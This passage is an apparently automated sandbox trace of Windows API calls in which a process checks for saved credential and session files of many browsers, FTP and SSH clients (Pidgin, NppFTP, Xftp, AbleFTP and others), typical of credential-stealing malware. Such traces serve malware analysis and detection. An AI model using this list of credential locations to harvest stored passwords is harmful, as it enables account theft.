dwFlags=0x0, lpMem=0x8722b0 | out: hHeap=0x840000) returned 1 [0181.180] GetProcessHeap () returned 0x840000 [0181.180] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0181.181] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0181.182] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0181.182] GetProcessHeap () returned 0x840000 [0181.182] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f50) returned 0x874280 [0181.517] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0181.517] wvsprintfW (in: param_1=0x874280, param_2="%s\\Opera", arglist=0x19f83c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera") returned 43 [0181.517] GetProcessHeap () returned 0x840000 [0181.517] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x5a) returned 0x872868 [0181.518] GetProcessHeap () returned 0x840000 [0181.518] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0181.518] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0181.518] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera") returned 0 [0181.519] GetProcessHeap () returned 0x840000 [0181.519] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0181.519] GetProcessHeap () returned 0x840000 [0181.519] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872868 | out: hHeap=0x840000) returned 1 [0181.523] GetProcessHeap () returned 0x840000 [0181.523] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x873a58 [0181.523] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0181.524] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\8pecxstudios\\Cyberfox86", pszValue="RootDir", pdwType=0x0, pvData=0x873a58, pcbData=0x19f84c*=0x104 | out: pdwType=0x0, pvData=0x873a58, pcbData=0x19f84c*=0x104) returned 0x2 [0182.204] GetProcessHeap () returned 0x840000 [0182.206] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0182.206] GetProcessHeap () returned 0x840000 [0182.206] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x873a58 [0182.206] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.207] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\8pecxstudios\\Cyberfox", pszValue="Path", pdwType=0x0, pvData=0x873a58, pcbData=0x19f84c*=0x104 | out: pdwType=0x0, pvData=0x873a58, pcbData=0x19f84c*=0x104) returned 0x2 [0182.207] GetProcessHeap () returned 0x840000 [0182.207] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0182.208] GetProcessHeap () returned 0x840000 [0182.208] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x873a58 [0182.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.210] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Pale Moon", pszValue="CurrentVersion", pdwType=0x0, pvData=0x873a58, pcbData=0x19f84c*=0x104 | out: pdwType=0x0, pvData=0x873a58, pcbData=0x19f84c*=0x104) returned 0x2 [0182.210] GetProcessHeap () returned 0x840000 [0182.210] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0182.210] GetProcessHeap () returned 0x840000 [0182.210] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x873a58 [0182.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.211] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Waterfox", pszValue="CurrentVersion", pdwType=0x0, pvData=0x873a58, pcbData=0x19f838*=0x104 | out: pdwType=0x0, pvData=0x873a58, pcbData=0x19f838*=0x104) returned 0x2 [0182.211] GetProcessHeap () returned 0x840000 [0182.211] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0182.243] GetProcessHeap () returned 0x840000 [0182.243] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x874280 [0182.244] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.245] wvsprintfW (in: param_1=0x874280, param_2="%s\\.purple\\accounts.xml", arglist=0x19f808 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\.purple\\accounts.xml") returned 58 [0182.245] GetProcessHeap () returned 0x840000 [0182.245] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x78) returned 0x860b98 [0182.246] GetProcessHeap () returned 0x840000 [0182.246] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.247] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\.purple\\accounts.xml") returned 0 [0182.610] GetProcessHeap () returned 0x840000 [0182.611] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x860b98 | out: hHeap=0x840000) returned 1 [0182.615] GetProcessHeap () returned 0x840000 [0182.615] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0182.616] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0182.617] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0182.708] GetProcessHeap () returned 0x840000 [0182.709] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5a) returned 0x874280 [0182.709] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.710] wvsprintfW (in: param_1=0x874280, param_2="%s\\SuperPutty", arglist=0x19f83c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\SuperPutty") returned 42 [0182.710] GetProcessHeap () returned 0x840000 [0182.710] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x58) returned 0x871d38 [0182.711] GetProcessHeap () returned 0x840000 [0182.711] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.711] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.712] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\SuperPutty") returned 0 [0182.712] GetProcessHeap () returned 0x840000 [0182.712] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0182.712] GetProcessHeap () returned 0x840000 [0182.712] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.735] GetProcessHeap () returned 0x840000 [0182.735] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0182.735] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0182.736] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0182.736] GetProcessHeap () returned 0x840000 [0182.736] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f70) returned 0x874280 [0182.737] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.738] wvsprintfW (in: param_1=0x874280, param_2="%s\\FTPShell\\ftpshell.fsi", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\FTPShell\\ftpshell.fsi") returned 44 [0182.738] GetProcessHeap () returned 0x840000 [0182.738] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x5c) returned 0x871d38 [0182.738] GetProcessHeap () returned 0x840000 [0182.738] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.738] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.739] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FTPShell\\ftpshell.fsi") returned 0 [0182.815] GetProcessHeap () returned 0x840000 [0182.815] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.815] GetProcessHeap () returned 0x840000 [0182.815] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0182.815] GetProcessHeap () returned 0x840000 [0182.815] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f9a) returned 0x874280 [0182.816] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.817] wvsprintfW (in: param_1=0x874280, param_2="%s\\Notepad++\\plugins\\config\\NppFTP\\NppFTP.xml", arglist=0x19f848 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Notepad++\\plugins\\config\\NppFTP\\NppFTP.xml") returned 80 [0182.817] GetProcessHeap () returned 0x840000 [0182.817] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xa4) returned 0x871d38 [0182.817] GetProcessHeap () returned 0x840000 [0182.817] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.818] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.818] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Notepad++\\plugins\\config\\NppFTP\\NppFTP.xml") returned 0 [0182.818] GetProcessHeap () returned 0x840000 [0182.818] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.818] GetProcessHeap () returned 0x840000 [0182.818] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0182.819] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0182.820] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0182.820] GetProcessHeap () returned 0x840000 [0182.820] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f74) returned 0x874280 [0182.820] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.821] wvsprintfW (in: param_1=0x874280, param_2="%s\\oZone3D\\MyFTP\\myftp.ini", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\oZone3D\\MyFTP\\myftp.ini") returned 46 [0182.821] GetProcessHeap () returned 0x840000 [0182.821] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x60) returned 0x871d38 [0182.821] GetProcessHeap () returned 0x840000 [0182.821] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.822] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.822] PathFileExistsW (pszPath="C:\\Program Files (x86)\\oZone3D\\MyFTP\\myftp.ini") returned 0 [0182.822] GetProcessHeap () returned 0x840000 [0182.822] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.822] GetProcessHeap () returned 0x840000 [0182.822] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0182.822] GetProcessHeap () returned 0x840000 [0182.823] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x874280 [0182.823] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.824] wvsprintfW (in: param_1=0x874280, param_2="%s\\FTPBox\\profiles.conf", arglist=0x19f848 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPBox\\profiles.conf") returned 58 [0182.824] GetProcessHeap () returned 0x840000 [0182.824] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x78) returned 0x860998 [0182.824] GetProcessHeap () returned 0x840000 [0182.824] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.825] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.825] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPBox\\profiles.conf") returned 0 [0182.825] GetProcessHeap () returned 0x840000 [0182.825] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x860998 | out: hHeap=0x840000) returned 1 [0182.825] GetProcessHeap () returned 0x840000 [0182.825] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0182.826] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0182.826] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0182.826] GetProcessHeap () returned 0x840000 [0182.826] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f94) returned 0x874280 [0182.827] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.828] wvsprintfW (in: param_1=0x874280, param_2="%s\\Sherrod Computers\\sherrod FTP\\favorites", arglist=0x19f83c | out: param_1="C:\\Program Files (x86)\\Sherrod Computers\\sherrod FTP\\favorites") returned 62 [0182.828] GetProcessHeap () returned 0x840000 [0182.828] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x80) returned 0x871d38 [0182.828] GetProcessHeap () returned 0x840000 [0182.828] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.829] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Sherrod Computers\\sherrod FTP\\favorites") returned 0 [0182.829] GetProcessHeap () returned 0x840000 [0182.829] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0182.829] GetProcessHeap () returned 0x840000 [0182.829] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.829] GetProcessHeap () returned 0x840000 [0182.829] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0182.830] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0182.830] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0182.830] GetProcessHeap () returned 0x840000 [0182.830] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f68) returned 0x874280 [0182.831] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.832] wvsprintfW (in: param_1=0x874280, param_2="%s\\FTP Now\\sites.xml", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\FTP Now\\sites.xml") returned 40 [0182.832] GetProcessHeap () returned 0x840000 [0182.832] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x54) returned 0x871d38 [0182.832] GetProcessHeap () returned 0x840000 [0182.832] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.832] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.833] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FTP Now\\sites.xml") returned 0 [0182.833] GetProcessHeap () returned 0x840000 [0182.833] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.833] GetProcessHeap () returned 0x840000 [0182.833] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0182.833] GetProcessHeap () returned 0x840000 [0182.833] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0182.834] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0182.834] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0182.834] GetProcessHeap () returned 0x840000 [0182.834] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f82) returned 0x874280 [0182.835] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.836] wvsprintfW (in: param_1=0x874280, param_2="%s\\NexusFile\\userdata\\ftpsite.ini", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\NexusFile\\userdata\\ftpsite.ini") returned 53 [0182.836] GetProcessHeap () returned 0x840000 [0182.836] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x6e) returned 0x871d38 [0182.836] GetProcessHeap () returned 0x840000 [0182.836] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.836] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.837] PathFileExistsW (pszPath="C:\\Program Files (x86)\\NexusFile\\userdata\\ftpsite.ini") returned 0 [0182.837] GetProcessHeap () returned 0x840000 [0182.837] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.837] GetProcessHeap () returned 0x840000 [0182.838] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0182.838] GetProcessHeap () returned 0x840000 [0182.838] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f70) returned 0x874280 [0182.838] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.840] wvsprintfW (in: param_1=0x874280, param_2="%s\\NexusFile\\ftpsite.ini", arglist=0x19f83c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NexusFile\\ftpsite.ini") returned 59 [0182.840] GetProcessHeap () returned 0x840000 [0182.840] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7a) returned 0x871d38 [0182.840] GetProcessHeap () returned 0x840000 [0182.840] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.841] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.841] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NexusFile\\ftpsite.ini") returned 0 [0182.841] GetProcessHeap () returned 0x840000 [0182.841] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.841] GetProcessHeap () returned 0x840000 [0182.841] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0182.845] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0182.846] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0182.846] GetProcessHeap () returned 0x840000 [0182.846] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f74) returned 0x874280 [0182.846] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.847] wvsprintfW (in: param_1=0x874280, param_2="%s\\NetSarang\\Xftp\\Sessions", arglist=0x19f830 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\NetSarang\\Xftp\\Sessions") returned 55 [0182.847] GetProcessHeap () returned 0x840000 [0182.847] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x72) returned 0x861098 [0182.847] GetProcessHeap () returned 0x840000 [0182.847] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.848] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.848] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\NetSarang\\Xftp\\Sessions") returned 0 [0182.849] GetProcessHeap () returned 0x840000 [0182.849] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0182.849] GetProcessHeap () returned 0x840000 [0182.849] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x861098 | out: hHeap=0x840000) returned 1 [0182.849] GetProcessHeap () returned 0x840000 [0182.849] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0182.850] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0182.850] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0182.850] GetProcessHeap () returned 0x840000 [0182.850] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f74) returned 0x874280 [0182.851] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.851] wvsprintfW (in: param_1=0x874280, param_2="%s\\NetSarang\\Xftp\\Sessions", arglist=0x19f818 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetSarang\\Xftp\\Sessions") returned 61 [0182.851] GetProcessHeap () returned 0x840000 [0182.851] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7e) returned 0x871d38 [0182.851] GetProcessHeap () returned 0x840000 [0182.851] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.852] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.852] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetSarang\\Xftp\\Sessions") returned 0 [0182.852] GetProcessHeap () returned 0x840000 [0182.852] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0182.852] GetProcessHeap () returned 0x840000 [0182.852] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.862] GetProcessHeap () returned 0x840000 [0182.862] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0182.863] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0182.863] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0182.863] GetProcessHeap () returned 0x840000 [0182.863] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x874280 [0182.864] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.865] wvsprintfW (in: param_1=0x874280, param_2="%s\\EasyFTP\\data", arglist=0x19f83c | out: param_1="C:\\Program Files (x86)\\EasyFTP\\data") returned 35 [0182.865] GetProcessHeap () returned 0x840000 [0182.865] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4a) returned 0x861f00 [0182.865] GetProcessHeap () returned 0x840000 [0182.865] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.866] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.866] PathFileExistsW (pszPath="C:\\Program Files (x86)\\EasyFTP\\data") returned 0 [0182.901] GetProcessHeap () returned 0x840000 [0182.901] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0182.901] GetProcessHeap () returned 0x840000 [0182.901] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x861f00 | out: hHeap=0x840000) returned 1 [0182.901] GetProcessHeap () returned 0x840000 [0182.901] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e8) returned 0x873a58 [0182.901] GetProcessHeap () returned 0x840000 [0182.901] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x872310 [0182.901] GetProcessHeap () returned 0x840000 [0182.901] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x874280 [0182.902] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0182.909] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x874280 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0182.909] GetProcessHeap () returned 0x840000 [0182.909] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x874490 [0182.910] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.911] wvsprintfW (in: param_1=0x874490, param_2="%s\\SftpNetDrive", arglist=0x19f838 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SftpNetDrive") returned 50 [0182.911] GetProcessHeap () returned 0x840000 [0182.911] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x68) returned 0x871d38 [0182.911] GetProcessHeap () returned 0x840000 [0182.911] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874490 | out: hHeap=0x840000) returned 1 [0182.912] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.912] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SftpNetDrive") returned 0 [0182.913] GetProcessHeap () returned 0x840000 [0182.913] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.913] GetProcessHeap () returned 0x840000 [0182.913] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.913] GetProcessHeap () returned 0x840000 [0182.913] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0182.913] GetProcessHeap () returned 0x840000 [0182.913] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872310 | out: hHeap=0x840000) returned 1 [0182.913] GetProcessHeap () returned 0x840000 [0182.913] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x874280 [0182.914] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.915] wvsprintfW (in: param_1=0x874280, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP7\\encPwd.jsd") returned 42 [0182.915] GetProcessHeap () returned 0x840000 [0182.915] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x58) returned 0x871d38 [0182.915] GetProcessHeap () returned 0x840000 [0182.915] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.916] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.916] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP7\\encPwd.jsd") returned 0 [0182.917] GetProcessHeap () returned 0x840000 [0182.917] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.917] GetProcessHeap () returned 0x840000 [0182.917] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x874280 [0182.918] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.918] wvsprintfW (in: param_1=0x874280, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\sshProfiles-j.jsd") returned 63 [0182.918] GetProcessHeap () returned 0x840000 [0182.918] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x82) returned 0x871d38 [0182.918] GetProcessHeap () returned 0x840000 [0182.919] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.919] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.919] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\sshProfiles-j.jsd") returned 0 [0182.920] GetProcessHeap () returned 0x840000 [0182.920] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.920] GetProcessHeap () returned 0x840000 [0182.920] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x874280 [0182.921] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.922] wvsprintfW (in: param_1=0x874280, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", 